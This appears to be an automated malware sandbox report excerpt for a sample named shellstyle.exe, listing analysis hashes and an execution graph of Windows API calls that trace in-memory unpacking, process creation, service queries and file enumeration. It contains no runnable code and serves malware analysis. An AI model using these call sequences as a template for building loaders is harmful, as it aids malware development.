                                                                                Uniqueness Score: -1.00%

                                                                                Function 002908F0, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2287162356.0000000000290000.00000040.00000001.sdmp, Offset: 00290000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_290000_WPDShextAutoplay.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryMove
                                                                                • String ID:
                                                                                • API String ID: 1951056069-0
                                                                                • Opcode ID: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction ID: 5bc0ae2866c071881f10646e9a5a48bdad0640dfd589b27f671be11290a6994b
                                                                                • Opcode Fuzzy Hash: 8e3fd66f474281e81dfdc8038c3d39c61aa2314e82aa304560e84bd4efe8ca18
                                                                                • Instruction Fuzzy Hash: DC412AB163430A5FDB14DE2ACC85BABB2D9AFC4B50F08493EF644D6240D671D52887E5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Analysis Process: shellstyle.exe PID: 2208 Parent PID: 1888 shellstyle.exeCOMMON

                                                                                Execution Graph

                                                                                Execution Coverage:9.5%
                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:1170
                                                                                Total number of Limit Nodes:13

                                                                                Graph

                                                                                execution_graph 5996 3d4b70 5997 3d4b98 5996->5997 5998 3d4b82 5996->5998 6001 3d4bd7 CreateProcessW 5997->6001 6003 3d3f00 GetPEB 5997->6003 5999 3d3f00 GetPEB 5998->5999 6000 3d4b8c 5999->6000 6002 3d3e60 GetPEB 6000->6002 6004 3d4bf7 6001->6004 6005 3d4c73 6001->6005 6002->5997 6006 3d4bc6 6003->6006 6007 3d4bff 6004->6007 6010 3d3f00 GetPEB 6004->6010 6015 3d4c33 6004->6015 6008 3d3e60 GetPEB 6006->6008 6009 3d4bd2 6008->6009 6009->6001 6011 3d4c27 6010->6011 6013 3d3e60 GetPEB 6011->6013 6012 3d4c5d 6013->6015 6014 3d3f00 GetPEB 6016 3d4c51 6014->6016 6015->6012 6015->6014 6017 3d3e60 GetPEB 6016->6017 6017->6012 6891 3d64b0 6892 3d64ba 6891->6892 6897 3d64d0 6891->6897 6893 3d3f00 GetPEB 6892->6893 6894 3d64c4 6893->6894 6895 3d3e60 GetPEB 6894->6895 6895->6897 6896 3d659a 6897->6896 6898 3d42c0 GetPEB 6897->6898 6899 3d657b 6898->6899 6899->6896 6901 3d4160 6899->6901 6902 3d4172 6901->6902 6906 3d4180 6901->6906 6903 3d3f00 GetPEB 6902->6903 6904 3d4177 6903->6904 6905 3d3e60 GetPEB 6904->6905 6905->6906 6906->6896 6913 3d78b0 6923 3d7990 6913->6923 6914 3d34c0 GetPEB 6914->6923 6915 3d7c1e 6917 3d7c3d 6915->6917 6918 3d3f00 GetPEB 6915->6918 6916 3d7c05 6919 3d7c31 6918->6919 6920 3d3e60 GetPEB 6919->6920 6920->6917 6921 3d3e60 GetPEB 6921->6923 6922 3d3f00 GetPEB 6922->6923 6923->6914 6923->6915 6923->6916 6923->6921 6923->6922 6924 3d7fb0 6925 3d34c0 GetPEB 6924->6925 6926 3d7fc2 6925->6926 6927 3d7fe3 6926->6927 6928 3d3f00 GetPEB 6926->6928 6931 3d8029 6927->6931 6932 3d3f00 GetPEB 6927->6932 6929 3d7fd7 6928->6929 6930 3d3e60 GetPEB 6929->6930 6930->6927 6935 3d3f00 GetPEB 6931->6935 6937 3d8051 6931->6937 6933 3d801d 6932->6933 6934 3d3e60 GetPEB 6933->6934 6934->6931 6936 3d8045 6935->6936 6938 3d3e60 GetPEB 6936->6938 6939 3d807d 6937->6939 6940 3d3f00 GetPEB 6937->6940 6938->6937 6941 3d8071 6940->6941 6942 3d3e60 GetPEB 6941->6942 6942->6939 7104 3d4df0 GetPEB 7111 3d4869 7119 3d4870 7111->7119 7112 3d496e 7113 3d492c 7112->7113 7114 3d3f00 GetPEB 7112->7114 7117 3d4981 7114->7117 7115 3d3e60 GetPEB 7115->7119 7116 3d3f00 GetPEB 7116->7119 7118 3d3e60 GetPEB 7117->7118 7118->7113 7119->7112 7119->7113 7119->7115 7119->7116 6943 3d1928 6952 3d191f 6943->6952 6944 3d1bc6 6945 3d35c0 GetPEB 6944->6945 6947 3d1bd0 6945->6947 6946 3d1ba4 6948 3d1bf1 6947->6948 6949 3d3f00 GetPEB 6947->6949 6955 3d3f00 GetPEB 6948->6955 6957 3d1c23 6948->6957 6950 3d1be5 6949->6950 6954 3d3e60 GetPEB 6950->6954 6951 3d4e30 GetPEB 6951->6952 6952->6944 6952->6946 6952->6951 6953 3d3f00 GetPEB 6952->6953 6963 3d35c0 GetPEB 6952->6963 6964 3d3e60 GetPEB 6952->6964 6953->6952 6954->6948 6956 3d1c17 6955->6956 6958 3d3e60 GetPEB 6956->6958 6959 3d1c4b 6957->6959 6960 3d3f00 GetPEB 6957->6960 6958->6957 6961 3d1c3f 6960->6961 6962 3d3e60 GetPEB 6961->6962 6962->6959 6963->6952 6964->6952 5818 2c0170 5819 2c01fb 5818->5819 5834 2c0ad0 5819->5834 5825 2c02c4 5871 2c06f0 5825->5871 5827 2c02d0 5888 2c08f0 5827->5888 5829 2c02dc 5906 2c0580 5829->5906 5831 2c02e8 5832 2c02ef VirtualFree 5831->5832 5833 2c02fb 5831->5833 5832->5833 5835 2c0b2f 5834->5835 5836 2c0bf0 VirtualAlloc 5835->5836 5837 2c02ab 5835->5837 5838 2c0c1c 5836->5838 5840 2c0d60 5837->5840 5838->5837 5839 2c0cdb VirtualAlloc 5838->5839 5839->5837 5841 2c0d94 5840->5841 5842 2c0da3 VirtualAlloc RtlMoveMemory 5841->5842 5843 2c02b8 5842->5843 5847 2c0ddb 5842->5847 5850 2c0400 GetCurrentProcess 5843->5850 5845 2c0e0d RtlMoveMemory 5845->5847 5846 2c0e3c VirtualAlloc 5846->5847 5847->5843 5847->5846 5848 2c0e91 RtlFillMemory 5847->5848 5849 2c0e6a RtlMoveMemory 5847->5849 5914 2c1140 lstrcpynW 5847->5914 5848->5843 5848->5847 5849->5843 5849->5847 5915 2c1140 lstrcpynW 5850->5915 5852 2c0459 NtQueryInformationProcess 5853 2c046f 5852->5853 5857 2c04c5 5852->5857 5854 2c0484 GetProcessHeap HeapFree 5853->5854 5855 2c0492 GetProcessHeap RtlAllocateHeap GetCurrentProcess NtQueryInformationProcess 5853->5855 5860 2c0575 5853->5860 5854->5855 5855->5853 5855->5857 5856 2c04e5 5916 2c1140 lstrcpynW 5856->5916 5857->5856 5921 2c1140 lstrcpynW 5857->5921 5861 2c04dc RtlMoveMemory 5861->5856 5862 2c04ef RtlMoveMemory 5917 2c1140 lstrcpynW 5862->5917 5864 2c0511 RtlMoveMemory 5918 2c1140 lstrcpynW 5864->5918 5866 2c0528 RtlMoveMemory 5919 2c1140 lstrcpynW 5866->5919 5868 2c053f RtlMoveMemory 5920 2c1140 lstrcpynW 5868->5920 5870 2c055a RtlMoveMemory 5870->5825 5872 2c0740 5871->5872 5874 2c0744 5872->5874 5922 2c0fb0 5872->5922 5874->5827 5875 2c0770 5875->5874 5878 2c07ff LoadLibraryA 5875->5878 5930 2c1140 lstrcpynW 5875->5930 5877 2c07b5 RtlMoveMemory 5877->5875 5879 2c08b9 5878->5879 5886 2c080f 5878->5886 5879->5827 5881 2c082d RtlMoveMemory 5881->5875 5881->5886 5882 2c0858 GetProcAddress 5882->5874 5882->5886 5884 2c0872 RtlMoveMemory 5933 2c1140 lstrcpynW 5884->5933 5886->5874 5886->5875 5886->5882 5887 2c0890 RtlMoveMemory 5886->5887 5931 2c1140 lstrcpynW 5886->5931 5932 2c1140 lstrcpynW 5886->5932 5887->5874 5887->5886 5889 2c0934 5888->5889 5890 2c0fb0 2 API calls 5889->5890 5891 2c0938 5889->5891 5892 2c0970 5890->5892 5891->5829 5892->5891 5936 2c1140 lstrcpynW 5892->5936 5894 2c09af RtlMoveMemory 5894->5891 5900 2c09c2 5894->5900 5897 2c09f6 RtlMoveMemory 5897->5900 5898 2c0a97 RtlMoveMemory 5899 2c0aac 5898->5899 5898->5900 5899->5829 5900->5891 5937 2c1140 lstrcpynW 5900->5937 5938 2c1140 lstrcpynW 5900->5938 5940 2c1140 lstrcpynW 5900->5940 5902 2c0a3e RtlMoveMemory 5902->5891 5903 2c0a57 5902->5903 5939 2c1140 lstrcpynW 5903->5939 5905 2c0a61 RtlMoveMemory 5905->5900 5910 2c05bc 5906->5910 5907 2c05c0 5907->5831 5909 2c0617 RtlMoveMemory 5909->5910 5910->5907 5912 2c069b VirtualProtect 5910->5912 5941 2c1140 lstrcpynW 5910->5941 5942 2c1140 lstrcpynW 5910->5942 5912->5910 5913 2c06c6 5912->5913 5913->5831 5914->5845 5915->5852 5916->5862 5917->5864 5918->5866 5919->5868 5920->5870 5921->5861 5924 2c0fda 5922->5924 5923 2c104a 5923->5875 5924->5923 5934 2c1140 lstrcpynW 5924->5934 5926 2c1001 5935 2c1140 lstrcpynW 5926->5935 5928 2c101b RtlMoveMemory 5929 2c1029 5928->5929 5929->5875 5930->5877 5931->5881 5932->5884 5933->5886 5934->5926 5935->5928 5936->5894 5937->5897 5938->5902 5939->5905 5940->5898 5941->5909 5942->5910 5943 3d30a0 5944 3d30ba 5943->5944 5945 3d32ab 5944->5945 5946 3d3f00 GetPEB 5944->5946 5949 3d3238 5944->5949 5950 3d3291 RtlAllocateHeap 5944->5950 5952 3d3e60 GetPEB 5944->5952 5945->5949 5953 3d3f00 GetPEB 5945->5953 5946->5944 5950->5944 5950->5949 5952->5944 5954 3d32bf 5953->5954 5955 3d3e60 5954->5955 5956 3d3ebc 5955->5956 5957 3d3e9c 5955->5957 5956->5949 5957->5956 5958 3d3f00 GetPEB 5957->5958 5961 3d40f5 5957->5961 5959 3d40e9 5958->5959 5960 3d3e60 GetPEB 5959->5960 5960->5961 5962 3d3f00 GetPEB 5961->5962 5968 3d4126 5961->5968 5964 3d411a 5962->5964 5963 3d3e60 GetPEB 5966 3d4157 5963->5966 5967 3d3e60 GetPEB 5964->5967 5965 3d4138 5965->5949 5966->5949 5967->5968 5968->5963 5968->5965 6018 3d5ce0 6026 3d65e0 6018->6026 6020 3d5ce5 6021 3d5d09 ExitProcess 6020->6021 6022 3d3f00 GetPEB 6020->6022 6023 3d5cf8 6022->6023 6024 3d3e60 GetPEB 6023->6024 6025 3d5d04 6024->6025 6025->6021 6070 3d65fd 6026->6070 6028 3d6dcd 6344 3db2e0 6028->6344 6031 3d706e 6369 3d8740 6031->6369 6033 3d68df 6033->6020 6038 3d7061 6360 3d8d40 6038->6360 6043 3d3f00 GetPEB 6043->6070 6044 3d7073 6044->6020 6047 3d6f27 GetTickCount 6047->6070 6051 3d4220 GetPEB 6051->6070 6052 3d7066 6052->6020 6055 3d3e60 GetPEB 6064 3d6927 6055->6064 6059 3d3f00 GetPEB 6059->6064 6063 3d3e60 GetPEB 6063->6070 6064->6047 6064->6055 6064->6059 6065 3d6975 GetTickCount 6064->6065 6065->6070 6070->6028 6070->6031 6070->6033 6070->6038 6070->6043 6070->6051 6070->6063 6070->6064 6071 3d4160 GetPEB 6070->6071 6072 3d8400 6070->6072 6078 3d7120 6070->6078 6099 3d8e80 6070->6099 6109 3d8970 6070->6109 6121 3d80a0 6070->6121 6135 3d9860 6070->6135 6151 3d9620 6070->6151 6160 3d12b0 6070->6160 6181 3dafe0 6070->6181 6186 3d8700 6070->6186 6192 3d6060 6070->6192 6213 3db430 6070->6213 6220 3d9f30 6070->6220 6229 3d61e0 6070->6229 6241 3d94d0 6070->6241 6248 3d3310 6070->6248 6258 3d1840 6070->6258 6273 3d3460 6070->6273 6283 3d53d0 6070->6283 6288 3d9270 6070->6288 6298 3d8bb0 6070->6298 6308 3d72d0 6070->6308 6318 3d9050 6070->6318 6332 3d4770 6070->6332 6349 3db1d0 6070->6349 6354 3d7410 6070->6354 6071->6070 6075 3d84e3 6072->6075 6073 3d85bd 6073->6070 6074 3d8600 CreateFileW 6074->6073 6074->6075 6075->6073 6075->6074 6076 3d3f00 GetPEB 6075->6076 6077 3d3e60 GetPEB 6075->6077 6076->6075 6077->6075 6080 3d7125 6078->6080 6079 3d7233 6387 3d34c0 6079->6387 6080->6079 6082 3d7232 6080->6082 6083 3d7080 GetPEB LoadLibraryW 6080->6083 6082->6070 6083->6080 6085 3d7265 LoadLibraryW 6087 3d727a 6085->6087 6088 3d7290 6085->6088 6086 3d3f00 GetPEB 6089 3d7254 6086->6089 6090 3d3f00 GetPEB 6087->6090 6093 3d72b8 6088->6093 6096 3d3f00 GetPEB 6088->6096 6091 3d3e60 GetPEB 6089->6091 6092 3d7284 6090->6092 6094 3d7260 6091->6094 6095 3d3e60 GetPEB 6092->6095 6093->6070 6094->6085 6095->6088 6097 3d72ac 6096->6097 6098 3d3e60 GetPEB 6097->6098 6098->6093 6101 3d8ea0 6099->6101 6100 3d901b 6104 3d8fc6 6100->6104 6105 3d3f00 GetPEB 6100->6105 6101->6100 6102 3d3f00 GetPEB 6101->6102 6103 3d8ff2 OpenServiceW 6101->6103 6101->6104 6108 3d3e60 GetPEB 6101->6108 6102->6101 6103->6101 6104->6070 6106 3d902e 6105->6106 6107 3d3e60 GetPEB 6106->6107 6107->6104 6108->6101 6119 3d8991 6109->6119 6110 3d3f00 GetPEB 6110->6119 6111 3d34c0 GetPEB 6111->6119 6112 3d8b74 6114 3d8add 6112->6114 6115 3d3f00 GetPEB 6112->6115 6114->6070 6116 3d8b87 6115->6116 6118 3d3e60 GetPEB 6116->6118 6117 3d3e60 GetPEB 6117->6119 6118->6114 6119->6110 6119->6111 6119->6112 6119->6114 6119->6117 6120 3d3460 GetPEB 6119->6120 6397 3d5040 6119->6397 6120->6119 6134 3d8163 6121->6134 6122 3d34c0 GetPEB 6122->6134 6123 3d8397 CreateFileW 6125 3d83ee 6123->6125 6123->6134 6124 3d83c7 6127 3d83eb CloseHandle 6124->6127 6129 3d3f00 GetPEB 6124->6129 6125->6070 6126 3d8358 6126->6070 6127->6125 6128 3d3f00 GetPEB 6128->6134 6130 3d83da 6129->6130 6131 3d3e60 GetPEB 6130->6131 6133 3d83e6 6131->6133 6132 3d3e60 GetPEB 6132->6134 6133->6127 6134->6122 6134->6123 6134->6124 6134->6126 6134->6128 6134->6132 6150 3d9880 6135->6150 6136 3d9b02 6138 3d9b26 SHGetFolderPathW 6136->6138 6141 3d3f00 GetPEB 6136->6141 6137 3d99b2 OpenSCManagerW 6137->6150 6422 3d3040 6138->6422 6139 3d3f00 GetPEB 6139->6150 6140 3d9969 SHGetFolderPathW 6140->6150 6145 3d9b15 6141->6145 6142 3d9a66 CloseServiceHandle 6142->6150 6147 3d3e60 GetPEB 6145->6147 6146 3d9af5 6146->6070 6148 3d9b21 6147->6148 6148->6138 6149 3d3e60 GetPEB 6149->6150 6150->6136 6150->6137 6150->6139 6150->6140 6150->6142 6150->6146 6150->6149 6427 3d7c60 6150->6427 6159 3d9630 6151->6159 6152 3d9829 6451 3d3780 6152->6451 6153 3d34c0 GetPEB 6153->6159 6154 3d981f 6154->6070 6156 3d9839 6156->6070 6157 3d3f00 GetPEB 6157->6159 6158 3d3e60 GetPEB 6158->6159 6159->6152 6159->6153 6159->6154 6159->6157 6159->6158 6163 3d12e1 6160->6163 6162 3d181c 6580 3d4220 6162->6580 6163->6162 6164 3d3f00 GetPEB 6163->6164 6167 3d17d1 6163->6167 6168 3d42c0 GetPEB 6163->6168 6170 3d34c0 GetPEB 6163->6170 6171 3d3e60 GetPEB 6163->6171 6175 3d4220 GetPEB 6163->6175 6176 3d1641 _snwprintf 6163->6176 6180 3d3460 GetPEB 6163->6180 6478 3d1fc0 6163->6478 6486 3d1e70 6163->6486 6495 3d5c00 6163->6495 6514 3d1c70 6163->6514 6530 3d2230 6163->6530 6538 3d2be0 6163->6538 6553 3d4ea0 6163->6553 6558 3d1900 6163->6558 6164->6163 6167->6070 6168->6163 6170->6163 6171->6163 6175->6163 6178 3d3460 GetPEB 6176->6178 6178->6163 6180->6163 6182 3db101 6181->6182 6185 3daff8 6181->6185 6182->6070 6183 3d3e60 GetPEB 6183->6185 6184 3d3f00 GetPEB 6184->6185 6185->6182 6185->6183 6185->6184 6187 3d8709 6186->6187 6188 3d871f 6186->6188 6189 3d3f00 GetPEB 6187->6189 6188->6070 6190 3d8713 6189->6190 6191 3d3e60 GetPEB 6190->6191 6191->6188 6622 3d5500 6192->6622 6194 3d613c 6196 3d35c0 GetPEB 6194->6196 6195 3d6134 6195->6070 6198 3d6147 6196->6198 6197 3d3f00 GetPEB 6201 3d6074 6197->6201 6200 3d6168 6198->6200 6202 3d3f00 GetPEB 6198->6202 6199 3d3e60 GetPEB 6199->6201 6205 3d61a2 6200->6205 6206 3d3f00 GetPEB 6200->6206 6201->6194 6201->6195 6201->6197 6201->6199 6203 3d615c 6202->6203 6204 3d3e60 GetPEB 6203->6204 6204->6200 6209 3d61ca 6205->6209 6210 3d3f00 GetPEB 6205->6210 6207 3d6196 6206->6207 6208 3d3e60 GetPEB 6207->6208 6208->6205 6209->6070 6211 3d61be 6210->6211 6212 3d3e60 GetPEB 6211->6212 6212->6209 6215 3db440 6213->6215 6214 3db4ba 6214->6070 6215->6214 6632 3dab50 6215->6632 6648 3da170 6215->6648 6669 3da7a0 6215->6669 6689 3da5e0 6215->6689 6227 3d9f40 6220->6227 6221 3da01b 6222 3d9f64 6221->6222 6224 3d3f00 GetPEB 6221->6224 6222->6070 6223 3d3f00 GetPEB 6223->6227 6225 3da02e 6224->6225 6226 3d3e60 GetPEB 6225->6226 6226->6222 6227->6221 6227->6222 6227->6223 6228 3d3e60 GetPEB 6227->6228 6228->6227 6238 3d6202 6229->6238 6230 3d42c0 GetPEB 6230->6238 6232 3d624b 6232->6070 6234 3d3e60 GetPEB 6234->6238 6235 3d3f00 GetPEB 6235->6238 6236 3d6490 6236->6070 6237 3d3f00 GetPEB 6239 3d642d 6237->6239 6238->6230 6238->6232 6238->6234 6238->6235 6238->6239 6804 3d55b0 6238->6804 6813 3d4c80 6238->6813 6239->6236 6239->6237 6240 3d3e60 GetPEB 6239->6240 6240->6239 6246 3d94f0 6241->6246 6242 3d95c2 6242->6070 6244 3d3f00 GetPEB 6244->6246 6245 3d4c80 GetPEB 6245->6246 6246->6242 6246->6244 6246->6245 6247 3d3e60 GetPEB 6246->6247 6822 3d46c0 6246->6822 6247->6246 6249 3d334a 6248->6249 6250 3d336f 6249->6250 6251 3d3f00 GetPEB 6249->6251 6254 3d3f00 GetPEB 6250->6254 6257 3d3397 6250->6257 6252 3d3363 6251->6252 6253 3d3e60 GetPEB 6252->6253 6253->6250 6255 3d338b 6254->6255 6256 3d3e60 GetPEB 6255->6256 6256->6257 6257->6070 6259 3d184c 6258->6259 6260 3d1862 6258->6260 6261 3d3f00 GetPEB 6259->6261 6264 3d3f00 GetPEB 6260->6264 6268 3d188b 6260->6268 6262 3d1856 6261->6262 6263 3d3e60 GetPEB 6262->6263 6263->6260 6265 3d187f 6264->6265 6266 3d3e60 GetPEB 6265->6266 6266->6268 6267 3d18ee 6267->6070 6268->6267 6837 3d25e0 6268->6837 6270 3d18d8 6271 3d18dc 6270->6271 6272 3d4220 GetPEB 6270->6272 6271->6070 6272->6267 6274 3d346d 6273->6274 6277 3d3483 6273->6277 6275 3d3f00 GetPEB 6274->6275 6276 3d3477 6275->6276 6278 3d3e60 GetPEB 6276->6278 6279 3d3f00 GetPEB 6277->6279 6281 3d34ab 6277->6281 6278->6277 6280 3d349f 6279->6280 6282 3d3e60 GetPEB 6280->6282 6281->6070 6282->6281 6287 3d53e0 6283->6287 6284 3d3f00 GetPEB 6284->6287 6285 3d54b4 6285->6070 6286 3d3e60 GetPEB 6286->6287 6287->6284 6287->6285 6287->6286 6296 3d9290 6288->6296 6289 3d949c 6291 3d9410 6289->6291 6293 3d3f00 GetPEB 6289->6293 6291->6070 6292 3d3f00 GetPEB 6292->6296 6294 3d94af 6293->6294 6295 3d3e60 GetPEB 6294->6295 6295->6291 6296->6289 6296->6291 6296->6292 6297 3d3e60 GetPEB 6296->6297 6852 3d1000 6296->6852 6297->6296 6307 3d8bc4 6298->6307 6299 3d8d1d 6861 3d36b0 6299->6861 6300 3d3780 2 API calls 6300->6307 6302 3d34c0 GetPEB 6302->6307 6303 3d8d10 6303->6070 6305 3d3f00 GetPEB 6305->6307 6306 3d3e60 GetPEB 6306->6307 6307->6299 6307->6300 6307->6302 6307->6303 6307->6305 6307->6306 6309 3d72d9 6308->6309 6313 3d72ef 6308->6313 6310 3d3f00 GetPEB 6309->6310 6311 3d72e3 6310->6311 6312 3d3e60 GetPEB 6311->6312 6312->6313 6314 3d3f00 GetPEB 6313->6314 6315 3d7318 6313->6315 6316 3d730c 6314->6316 6315->6070 6317 3d3e60 GetPEB 6316->6317 6317->6315 6330 3d9070 6318->6330 6319 3d91de 6319->6070 6320 3d3f00 GetPEB 6320->6330 6321 3d91e4 6322 3d921f 6321->6322 6323 3d3f00 GetPEB 6321->6323 6326 3d9247 6322->6326 6327 3d3f00 GetPEB 6322->6327 6324 3d9213 6323->6324 6325 3d3e60 GetPEB 6324->6325 6325->6322 6326->6070 6329 3d923b 6327->6329 6328 3d3e60 GetPEB 6328->6330 6331 3d3e60 GetPEB 6329->6331 6330->6319 6330->6320 6330->6321 6330->6328 6331->6326 6333 3d4785 6332->6333 6342 3d479b 6332->6342 6335 3d3f00 GetPEB 6333->6335 6334 3d47cb GetCurrentProcessId 6339 3d47d5 6334->6339 6337 3d478f 6335->6337 6336 3d3f00 GetPEB 6338 3d47b7 6336->6338 6340 3d3e60 GetPEB 6337->6340 6341 3d3e60 GetPEB 6338->6341 6339->6070 6340->6342 6343 3d47c3 6341->6343 6342->6334 6342->6336 6343->6334 6348 3db2ec 6344->6348 6345 3db422 6345->6033 6346 3d3f00 GetPEB 6346->6348 6347 3d3e60 GetPEB 6347->6348 6348->6345 6348->6346 6348->6347 6350 3db1e0 6349->6350 6351 3db2b2 6350->6351 6352 3d3f00 GetPEB 6350->6352 6353 3d3e60 GetPEB 6350->6353 6351->6070 6351->6351 6352->6350 6353->6350 6356 3d7420 6354->6356 6355 3d7608 6355->6070 6356->6355 6357 3d3e60 GetPEB 6356->6357 6358 3d4fd0 GetPEB 6356->6358 6359 3d3f00 GetPEB 6356->6359 6357->6356 6358->6356 6359->6356 6367 3d8d50 6360->6367 6361 3d8e3f 6362 3d4b70 2 API calls 6361->6362 6364 3d8e4f 6362->6364 6363 3d8e29 6363->6052 6364->6052 6365 3d34c0 GetPEB 6365->6367 6366 3d3f00 GetPEB 6366->6367 6367->6361 6367->6363 6367->6365 6367->6366 6368 3d3e60 GetPEB 6367->6368 6368->6367 6375 3d8753 6369->6375 6370 3d34c0 GetPEB 6370->6375 6371 3d8903 6377 3d3f00 GetPEB 6371->6377 6378 3d8922 6371->6378 6373 3d88df 6373->6044 6374 3d8e80 2 API calls 6374->6375 6375->6370 6375->6371 6375->6373 6375->6374 6376 3d3f00 GetPEB 6375->6376 6384 3d3780 2 API calls 6375->6384 6385 3d3e60 GetPEB 6375->6385 6880 3d7700 6375->6880 6376->6375 6379 3d8916 6377->6379 6380 3d8955 6378->6380 6382 3d3f00 GetPEB 6378->6382 6381 3d3e60 GetPEB 6379->6381 6380->6044 6381->6378 6383 3d8949 6382->6383 6386 3d3e60 GetPEB 6383->6386 6384->6375 6385->6375 6386->6380 6388 3d34e3 6387->6388 6389 3d3f00 GetPEB 6388->6389 6392 3d3508 6388->6392 6390 3d34fc 6389->6390 6391 3d3e60 GetPEB 6390->6391 6391->6392 6393 3d3f00 GetPEB 6392->6393 6396 3d3530 6392->6396 6394 3d3524 6393->6394 6395 3d3e60 GetPEB 6394->6395 6395->6396 6396->6085 6396->6086 6411 3d505c 6397->6411 6398 3d5386 6401 3d53ae 6398->6401 6404 3d3f00 GetPEB 6398->6404 6399 3d5367 6399->6398 6400 3d3f00 GetPEB 6399->6400 6402 3d537a 6400->6402 6401->6119 6403 3d3e60 GetPEB 6402->6403 6403->6398 6408 3d53a2 6404->6408 6405 3d534d RtlAllocateHeap 6405->6401 6405->6411 6407 3d3f00 GetPEB 6407->6411 6409 3d3e60 GetPEB 6408->6409 6409->6401 6410 3d3e60 GetPEB 6410->6411 6411->6399 6411->6401 6411->6405 6411->6407 6411->6410 6412 3d42c0 6411->6412 6413 3d42cd 6412->6413 6414 3d42e3 6412->6414 6415 3d3f00 GetPEB 6413->6415 6418 3d3f00 GetPEB 6414->6418 6421 3d430b 6414->6421 6416 3d42d7 6415->6416 6417 3d3e60 GetPEB 6416->6417 6417->6414 6419 3d42ff 6418->6419 6420 3d3e60 GetPEB 6419->6420 6420->6421 6421->6411 6423 3d3050 6422->6423 6425 3d307a 6423->6425 6437 3d38f0 6423->6437 6425->6146 6426 3d3092 6426->6146 6433 3d7c80 6427->6433 6428 3d7ddd 6431 3d3f00 GetPEB 6428->6431 6432 3d7dfd 6428->6432 6429 3d7d97 6429->6150 6430 3d3f00 GetPEB 6430->6433 6435 3d7df1 6431->6435 6432->6150 6433->6428 6433->6429 6433->6430 6434 3d3e60 GetPEB 6433->6434 6434->6433 6436 3d3e60 GetPEB 6435->6436 6436->6432 6449 3d3910 6437->6449 6438 3d3a3b FindFirstFileW 6442 3d3b8f 6438->6442 6438->6449 6439 3d3ac1 6439->6426 6440 3d3f00 GetPEB 6440->6449 6441 3d3b70 6441->6442 6443 3d3f00 GetPEB 6441->6443 6442->6426 6445 3d3b83 6443->6445 6444 3d3e60 GetPEB 6444->6449 6446 3d3e60 GetPEB 6445->6446 6446->6442 6447 3d34c0 GetPEB 6447->6449 6448 3d38f0 GetPEB 6448->6449 6449->6438 6449->6439 6449->6440 6449->6441 6449->6444 6449->6447 6449->6448 6450 3d3460 GetPEB 6449->6450 6450->6449 6452 3d3795 6451->6452 6453 3d37ab 6451->6453 6454 3d3f00 GetPEB 6452->6454 6457 3d37dd 6453->6457 6458 3d3f00 GetPEB 6453->6458 6455 3d379f 6454->6455 6456 3d3e60 GetPEB 6455->6456 6456->6453 6461 3d3812 6457->6461 6462 3d3f00 GetPEB 6457->6462 6459 3d37d1 6458->6459 6460 3d3e60 GetPEB 6459->6460 6460->6457 6465 3d384a 6461->6465 6466 3d3f00 GetPEB 6461->6466 6463 3d3806 6462->6463 6464 3d3e60 GetPEB 6463->6464 6464->6461 6469 3d3876 6465->6469 6470 3d3f00 GetPEB 6465->6470 6467 3d383e 6466->6467 6468 3d3e60 GetPEB 6467->6468 6468->6465 6473 3d38d1 SHFileOperationW 6469->6473 6474 3d3f00 GetPEB 6469->6474 6471 3d386a 6470->6471 6472 3d3e60 GetPEB 6471->6472 6472->6469 6473->6156 6475 3d38c0 6474->6475 6476 3d3e60 GetPEB 6475->6476 6477 3d38cc 6476->6477 6477->6473 6484 3d1fd2 6478->6484 6479 3d2212 6480 3d2208 6479->6480 6482 3d4220 GetPEB 6479->6482 6480->6163 6481 3d42c0 GetPEB 6481->6484 6482->6480 6483 3d3f00 GetPEB 6483->6484 6484->6479 6484->6480 6484->6481 6484->6483 6485 3d3e60 GetPEB 6484->6485 6485->6484 6493 3d1e86 6486->6493 6487 3d1f77 6488 3d1f68 6487->6488 6489 3d3f00 GetPEB 6487->6489 6488->6163 6491 3d1f98 6489->6491 6490 3d3f00 GetPEB 6490->6493 6492 3d3e60 GetPEB 6491->6492 6492->6488 6493->6487 6493->6488 6493->6490 6494 3d3e60 GetPEB 6493->6494 6494->6493 6496 3d5c26 6495->6496 6497 3d5c10 6495->6497 6501 3d3f00 GetPEB 6496->6501 6505 3d5c4e 6496->6505 6498 3d3f00 GetPEB 6497->6498 6499 3d5c1a 6498->6499 6500 3d3e60 GetPEB 6499->6500 6500->6496 6502 3d5c42 6501->6502 6504 3d3e60 GetPEB 6502->6504 6503 3d5cd2 6503->6163 6504->6505 6505->6503 6506 3d5c99 6505->6506 6507 3d3f00 GetPEB 6505->6507 6510 3d3f00 GetPEB 6506->6510 6511 3d5cc1 6506->6511 6508 3d5c8d 6507->6508 6509 3d3e60 GetPEB 6508->6509 6509->6506 6512 3d5cb5 6510->6512 6511->6163 6513 3d3e60 GetPEB 6512->6513 6513->6511 6515 3d1d06 6514->6515 6516 3d1cf0 6514->6516 6520 3d1dad 6515->6520 6521 3d3f00 GetPEB 6515->6521 6517 3d3f00 GetPEB 6516->6517 6518 3d1cfa 6517->6518 6519 3d3e60 GetPEB 6518->6519 6519->6515 6524 3d1de1 6520->6524 6525 3d3f00 GetPEB 6520->6525 6522 3d1da1 6521->6522 6523 3d3e60 GetPEB 6522->6523 6523->6520 6528 3d4ea0 GetPEB 6524->6528 6526 3d1dd5 6525->6526 6527 3d3e60 GetPEB 6526->6527 6527->6524 6529 3d1e15 6528->6529 6529->6163 6531 3d2255 6530->6531 6532 3d229c 6531->6532 6533 3d3f00 GetPEB 6531->6533 6535 3d25be 6531->6535 6536 3d3e60 GetPEB 6531->6536 6532->6163 6533->6531 6534 3d25cd 6534->6163 6535->6534 6537 3d4220 GetPEB 6535->6537 6536->6531 6537->6534 6550 3d2c1a 6538->6550 6539 3d2fcf 6542 3d2fee 6539->6542 6543 3d3f00 GetPEB 6539->6543 6541 3d2cae 6541->6163 6542->6163 6546 3d2fe2 6543->6546 6544 3d3f00 GetPEB 6544->6550 6545 3d34c0 GetPEB 6545->6550 6547 3d3e60 GetPEB 6546->6547 6547->6542 6548 3d3e60 GetPEB 6548->6550 6549 3d3460 GetPEB 6549->6550 6550->6539 6550->6541 6550->6544 6550->6545 6550->6548 6550->6549 6551 